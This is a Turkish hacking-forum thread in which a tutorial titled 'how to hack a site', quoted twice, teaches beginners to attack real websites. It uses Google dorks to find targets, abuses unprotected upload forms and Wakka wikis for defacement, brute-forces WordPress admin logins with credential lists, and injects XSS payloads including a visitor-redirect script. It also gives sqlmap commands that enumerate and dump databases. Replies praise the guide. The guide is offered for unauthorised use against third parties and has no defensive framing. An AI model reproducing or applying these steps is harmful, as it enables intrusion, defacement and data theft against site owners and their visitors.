[FULL] Site Nasıl Hacklenir ? - Hepsi Tek Konuda !

UmutSuzDum' Alıntı:

Ellerine Sağlık müthiş olmuş ama konu kaldırılacak büyük ihtimallen dork vermek yasak üyüzen konuyu ss alıyorum

Genişletmek için tıkla ...

Hocam , Pek Kaldırılacağını Sanmıyorum , Çünkü Zaten Konuda Baya Emek var ve + Olarakta Ben Dork Paylaşmadım Sadece Örnek Verdim :
Genede Uyarınız İçin Teşekkürler UmutSuzDum

Muhammed1999' Alıntı:

Lütfen konu kapatılmasın, gerekli düzenlemeleri yapın gerekirse. Güzel bir konu olmuş çünkü

Genişletmek için tıkla ...

@Muhammed1999 Çok Teşekkür Ederim : , UmutSuzDum Hocama Dediğim gibi" Kaldırılacağını Sanmam :

IIHDIISüvariII' Alıntı:

Valla Konu Süper Olmuş Kaldırırsa Üzülürüm

Genişletmek için tıkla ...

ByZehirx' Alıntı:

Konu içeriği pek ilgimi çekmedi zaten ,unu eledik eleklerimizi adalı çok oldu.

Yazmam ve teşekkür, (ilgim alakam)
Teşvik etmek ayrıca bazı konulara ise #tersini yazmaktayim

Konu benim telefonumda sahip olmadığım (rakam) kadar resim ile açılmış ki telefonumda bu kadar resim yok.

Renkler ile vurgulama (dikkat) başlık odaklamasi olması kadar.

Konu tek başlık altından farklı metodlar ile eskisi yenisi (eksikleriyle) açılması. Nokta

Bu tarz konuları emek verip actinmi tamda böyle görsel ve renkli huzur verici oluyor.
Bak mesela bidaha ( HeroRahim01 ) konun olursa yine gelir bakarım bir nevi takip edilir bu o bilgiye ihtiyacım olduğundan değil örnek bu konudaki bir çok bilgiyi ben android uygulamasını yaptım (Google Android)kategorisinde duruyor.
Mesele bu kadar güzel açılan konu sayısı çok azken bu tarz konulara ben konu içeriği dışında bu yorumu yazarak örnek teşkil edilmesini sağlamak adamlar öyle bilgiler paylaşıyor ki ihtiyacı olan bir kimsenin konudaki kaliteyi alamaması konu içeriği bilginin de kıymetini anlamakta zorlanıyor.

Uzatmiyorum teşekkürü ettim ve gittim.

Genişletmek için tıkla ...

Hocam Zaten Ben Herşey Aynı yerde Kısıtlı Olsun Diye Yazdım , Yoksa Bunları Bilmeyen 5 6 Kişi Vardır :
Teşekkürler :kalp

UmutSuzDum' Alıntı:

Ellerine Sağlık müthiş olmuş ama konu kaldırılacak büyük ihtimallen dork vermek yasak üyüzen konuyu ss alıyorum

Genişletmek için tıkla ...

HeroRahim01' Alıntı:

Arkadaşlar Merhaba , Bu Lafı Her Konuda 1 Kez Görmüşsünüzdür Ancak Ben Kesin Diyorum "Bu Konu İle İlgili Çok Araştırdım Forumda , Bazıları İsimlerini vermiş ancak Nasıl Yapıldığını Dememiş ve ya Tam Aksine ve ya İndirme Linklerini Vermemiş vbs." Bu Konuda Herşeyi Anlatıcam :

NOT : Uluslararası İnterpol Siber Güvenlik Ekibinden Olmadığım için Bazı Hatalarım Ola Bilir , Anlayışla Karşılayınız :

Kolaydan Zora Doğru Anlatacağım ...

1-) Upload Açığı
Bu Açığı Bilmeden Direk SQL vbs. Geçen Kişi Tanımıyorum : , Normalde Bununla İlgili Onlarca Dork Mevcut Ancak En Sağlamı Benim Vereceğim Dorkdur :
Dorkumuz : intitle:"Powered by Phuploader"
Bunu İnternette Aratıyoruz ve Karşımıza Gelen Bir Siteye Giriyoruz ...

Karşımıza Gelen Sayfalardan 2 - 10 Arası Dosya Seç Butonu Olacaktır İlk Butona İndex ve ya Resim Ekliyoruz ve Soldaki Gönder Butonuna Basıyoruz ...

Siteye Zarar Verirmi ? : Hayır , Bunu HızlıResime Resim Yüklemek Gibi Düşünün Sadece Zone Kasmamızda İşe Yaraya Bilir ...

2-) Waka Wikii Açığı
Bu Açıkta Siteye Zarar Vermez Ancak Yeni Gelen Misafirlere Hediye Burakmış Oluruz : , Dorkumuzu Arattıktan Sonra Bir Siteye Giriyoruz ve Editleyeceğimiz Yere Çift Tıklıyoruz ...
Dork : wakka.php?wiki=

İstediğimiz Yazıyı Yazıyoruz ... Sonra Aşağıdaki Butona Basıyoruz ve Sitemiz Yenileniyor ...

Sansürlediğimiz Yerler Başka Bir Forumdu , Önceden Başka Birisi Uğramış Siteye :
Siteye Zarar Verirmi ? : Hayır , Sadece Zone Kasa Bilirsiniz ...

3-) Brute Force ( Kaba Kuvvet )
Bu Bir Açık Değil , Aramamotoru İle Çektiğimiz Sitelerin Üzerinde Belirlenen Admin:Şifre Listesini Denetler ve Olumlu Sonuçları Bize Gösterir

Öncelikle Dork Oluşturalım:
Benim Oluşturacağım Dork ( /wp-content/plugins/ ) Olacaktır ...
Dork Oluşturmanın Püf Noktası: Kimsenin Aklına Gelmeyecek Yazılar Yazmak , Örn.( Deep , Last , Send ) Daha Fazla Hits Düşer ...

Kod:

[/COLOR][/COLOR]
[COLOR=White][COLOR=Lime]/wp-content/plugins/hits
/wp-content/plugins/last
/wp-content/plugins/send
/wp-content/plugins/note
/wp-content/plugins/climb
/wp-content/plugins/sorry
/wp-content/plugins/gear
/wp-content/plugins/nothing
/wp-content/plugins/all
/wp-content/plugins/after

Şimdi Bunu Arama Motorumuzda Denetleyelim ...

(1) Butonuna Basıyoruz
(2) Dorklarımızı Yapıştırıyoruz

(3) Tarama Kısımına Geçiyoruz
(4) Taramayı Başlatıyoruz
(5) Kaydediyoruz ...

"Brute Force"ye Giriyoruz ...

En Alttaki Siyah Yazılara Tıklıyoruz
Site List - Admin - Pass = .txt lerimizi Ekliyoruz ...

Brute Forceyi Başlatıyoruz (+)

Düşen Hitsler ( " Good Accounts " ) Gözükecektir.

17% Oldu Daha 0 Site Düştü Onlarında Tema Edit Kapalı , O Yüzden Shell Basmayı , Mass Basmayı ve Config Çekmeyi Anlatamıyorum ... Yeni Bir Konuda Anlatırım :

4-) XSS Açığı
Bu Açık Eskiden En Fazla Kullanılan Açıklardandı , Şu Dönemler Çokta Kullanılmıyor ...
Dorkumuzu İnternette Aratıyoruz : index.php?id=
Karşımıza Çıkacak Sitelerden Birisine Giriyoruz , Örnek.(Welcome to CAcert.org)
Bu Sitede xxxxxxxx/index.php?id= Den Sonraki Herşeyi Siliyoruz ... Bu Şekilde.(Welcome to CAcert.org)
Şimdi URL Sonuna <script>alert(Herorahim);</script>
Yazıyoruz , Örnek.(Welcome to CAcert.org<script>alert(Herorahim);</script> )
Önümüze Hata Gelirse Sitede XSS Açığından Yararlandık Demektir , Eğer Gelmediyse Bunu Yorum - Arama Kutusu - İletişim Kısımına vbs. Deneyin ...

Bu Ne İşimize Yarayacak ? : Siteye Yönlendirme Ekleyerek Kendi Sitemize Üye Çeke Biliriz ...
Tek Yapmamız Gereken = ?id= Sonuna <script>****************.href= www.turkhackteam.org</script>
Eklemek Olacaktır...

Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok :

5-) SQL Açığı

En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz Siteye :
SQL Açığından Havij , SQLMap , vbs. Programlarla Yararlana Biliriz , Ben Size SqlMap Üzerinde Anlatacağım ..

İlk Önce

Kod:

 cd sqlmap

Kodumuzu Giriyoruz , Sonrasında Database Çekiyoruz ...

Kod:

sqlmap.py -u www.örnek.com/index.php?id=5 --dbs[/COLOR][/COLOR]
[COLOR=White][COLOR=lime]

Karşımızda Aşağılarda " available_database " Olacaktır , Onun Altındakiler Bizim Databaselerimiz ..
Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz ...

Kod:

sqlmap.py -u www.örnek.com/index.php?id=5 -D Databaseismi --tables[/COLOR][/COLOR]
[COLOR=White][COLOR=lime]

tablesden Önce iki adet - Olacaktır ...
Sonrasında Veriler Çekilecektir ( Bu Biraz Sürüyor )
Çekilen Verilerin Kolonlarını Görmek İçin

Kod:

sqlmap.py -u www.örnek.com/index.php?id=1 -D Databaseismi -T veriadı -C kolon1,kolon2,kolon3 --dump[/COLOR][/COLOR]
[COLOR=White][COLOR=Lime]

Not: Burdada Dumpdan Önce iki adet - Olacaktır

ve Belirlediğimiz Kolonun Datası Çekiliyor ...
Sonuç Bu Şekilde Olacaktır ...

SqlMap İndirme Linki : sqlmap: automatic SQL injection and database takeover tool

Arkadaşlar Konuya 2 Saat Civarı Emek Verdim ... Lütfen Bir Teşekkürü Çok Görmeyin :

Genişletmek için tıkla ...

HeroRahim01' Alıntı:

Arkadaşlar Merhaba , Bu Lafı Her Konuda 1 Kez Görmüşsünüzdür Ancak Ben Kesin Diyorum "Bu Konu İle İlgili Çok Araştırdım Forumda , Bazıları İsimlerini vermiş ancak Nasıl Yapıldığını Dememiş ve ya Tam Aksine ve ya İndirme Linklerini Vermemiş vbs." Bu Konuda Herşeyi Anlatıcam :

NOT : Uluslararası İnterpol Siber Güvenlik Ekibinden Olmadığım için Bazı Hatalarım Ola Bilir , Anlayışla Karşılayınız :

Kolaydan Zora Doğru Anlatacağım ...

1-) Upload Açığı
Bu Açığı Bilmeden Direk SQL vbs. Geçen Kişi Tanımıyorum : , Normalde Bununla İlgili Onlarca Dork Mevcut Ancak En Sağlamı Benim Vereceğim Dorkdur :
Dorkumuz : intitle:"Powered by Phuploader"
Bunu İnternette Aratıyoruz ve Karşımıza Gelen Bir Siteye Giriyoruz ...

Karşımıza Gelen Sayfalardan 2 - 10 Arası Dosya Seç Butonu Olacaktır İlk Butona İndex ve ya Resim Ekliyoruz ve Soldaki Gönder Butonuna Basıyoruz ...

Siteye Zarar Verirmi ? : Hayır , Bunu HızlıResime Resim Yüklemek Gibi Düşünün Sadece Zone Kasmamızda İşe Yaraya Bilir ...

2-) Waka Wikii Açığı
Bu Açıkta Siteye Zarar Vermez Ancak Yeni Gelen Misafirlere Hediye Burakmış Oluruz : , Dorkumuzu Arattıktan Sonra Bir Siteye Giriyoruz ve Editleyeceğimiz Yere Çift Tıklıyoruz ...
Dork : wakka.php?wiki=

İstediğimiz Yazıyı Yazıyoruz ... Sonra Aşağıdaki Butona Basıyoruz ve Sitemiz Yenileniyor ...

Sansürlediğimiz Yerler Başka Bir Forumdu , Önceden Başka Birisi Uğramış Siteye :
Siteye Zarar Verirmi ? : Hayır , Sadece Zone Kasa Bilirsiniz ...

3-) Brute Force ( Kaba Kuvvet )
Bu Bir Açık Değil , Aramamotoru İle Çektiğimiz Sitelerin Üzerinde Belirlenen Admin:Şifre Listesini Denetler ve Olumlu Sonuçları Bize Gösterir

Öncelikle Dork Oluşturalım:
Benim Oluşturacağım Dork ( /wp-content/plugins/ ) Olacaktır ...
Dork Oluşturmanın Püf Noktası: Kimsenin Aklına Gelmeyecek Yazılar Yazmak , Örn.( Deep , Last , Send ) Daha Fazla Hits Düşer ...

Kod:

[/COLOR][/COLOR]
[COLOR=White][COLOR=Lime]/wp-content/plugins/hits
/wp-content/plugins/last
/wp-content/plugins/send
/wp-content/plugins/note
/wp-content/plugins/climb
/wp-content/plugins/sorry
/wp-content/plugins/gear
/wp-content/plugins/nothing
/wp-content/plugins/all
/wp-content/plugins/after

Şimdi Bunu Arama Motorumuzda Denetleyelim ...

(1) Butonuna Basıyoruz
(2) Dorklarımızı Yapıştırıyoruz

(3) Tarama Kısımına Geçiyoruz
(4) Taramayı Başlatıyoruz
(5) Kaydediyoruz ...

"Brute Force"ye Giriyoruz ...

En Alttaki Siyah Yazılara Tıklıyoruz
Site List - Admin - Pass = .txt lerimizi Ekliyoruz ...

Brute Forceyi Başlatıyoruz (+)

Düşen Hitsler ( " Good Accounts " ) Gözükecektir.

17% Oldu Daha 0 Site Düştü Onlarında Tema Edit Kapalı , O Yüzden Shell Basmayı , Mass Basmayı ve Config Çekmeyi Anlatamıyorum ... Yeni Bir Konuda Anlatırım :

4-) XSS Açığı
Bu Açık Eskiden En Fazla Kullanılan Açıklardandı , Şu Dönemler Çokta Kullanılmıyor ...
Dorkumuzu İnternette Aratıyoruz : index.php?id=
Karşımıza Çıkacak Sitelerden Birisine Giriyoruz , Örnek.(Welcome to CAcert.org)
Bu Sitede xxxxxxxx/index.php?id= Den Sonraki Herşeyi Siliyoruz ... Bu Şekilde.(Welcome to CAcert.org)
Şimdi URL Sonuna <script>alert(Herorahim);</script>
Yazıyoruz , Örnek.(Welcome to CAcert.org<script>alert(Herorahim);</script> )
Önümüze Hata Gelirse Sitede XSS Açığından Yararlandık Demektir , Eğer Gelmediyse Bunu Yorum - Arama Kutusu - İletişim Kısımına vbs. Deneyin ...

Bu Ne İşimize Yarayacak ? : Siteye Yönlendirme Ekleyerek Kendi Sitemize Üye Çeke Biliriz ...
Tek Yapmamız Gereken = ?id= Sonuna <script>****************.href= www.turkhackteam.org</script>
Eklemek Olacaktır...

Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok :

5-) SQL Açığı

En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz Siteye :
SQL Açığından Havij , SQLMap , vbs. Programlarla Yararlana Biliriz , Ben Size SqlMap Üzerinde Anlatacağım ..

İlk Önce

Kod:

 cd sqlmap

Kodumuzu Giriyoruz , Sonrasında Database Çekiyoruz ...

Kod:

sqlmap.py -u www.örnek.com/index.php?id=5 --dbs[/COLOR][/COLOR]
[COLOR=White][COLOR=lime]

Karşımızda Aşağılarda " available_database " Olacaktır , Onun Altındakiler Bizim Databaselerimiz ..
Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz ...

Kod:

sqlmap.py -u www.örnek.com/index.php?id=5 -D Databaseismi --tables[/COLOR][/COLOR]
[COLOR=White][COLOR=lime]

tablesden Önce iki adet - Olacaktır ...
Sonrasında Veriler Çekilecektir ( Bu Biraz Sürüyor )
Çekilen Verilerin Kolonlarını Görmek İçin

Kod:

sqlmap.py -u www.örnek.com/index.php?id=1 -D Databaseismi -T veriadı -C kolon1,kolon2,kolon3 --dump[/COLOR][/COLOR]
[COLOR=White][COLOR=Lime]

Not: Burdada Dumpdan Önce iki adet - Olacaktır

ve Belirlediğimiz Kolonun Datası Çekiliyor ...
Sonuç Bu Şekilde Olacaktır ...

SqlMap İndirme Linki : sqlmap: automatic SQL injection and database takeover tool

Arkadaşlar Konuya 2 Saat Civarı Emek Verdim ... Lütfen Bir Teşekkürü Çok Görmeyin :

Genişletmek için tıkla ...